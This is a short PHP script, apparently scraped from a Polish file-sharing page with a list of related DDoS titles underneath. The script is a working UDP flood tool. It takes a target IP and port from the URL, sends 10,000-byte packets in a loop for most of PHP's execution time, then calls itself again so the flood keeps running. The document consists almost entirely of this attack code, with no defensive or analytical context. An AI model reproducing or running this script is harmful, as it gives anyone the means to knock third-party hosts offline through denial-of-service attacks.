$_GET['ip'] = ! empty($_GET['ip']) ? long2ip(ip2long($_GET['ip'])) : $_SERVER['REMOTE_ADDR'];
$_GET['port'] = ! empty($_GET['port']) ? abs(intval($_GET['port'])) : 666;
$fp = fsockopen('udp://'.$_GET['ip'], $_GET['port']);
$time = time();
$while = floor ( ini_get('max_execution_time') * 0.8 );
while((time() - $time) < $while)
fwrite($fp, str_repeat('x', 10000));
fclose($fp);
$fp = fopen($_SERVER['SCRIPT_URI'].'?ip='.$_GET['ip'].'&port='.$_GET['port'], 'r');
fclose($fp);
exit;
?>
Wyszukiwarka
Podobne podstrony:
ddos 2Obrona przed atakami DDoS w Linuxddos first aidddos 3Hakowanie Na Linuxie cz2(Attack DDos)więcej podobnych podstron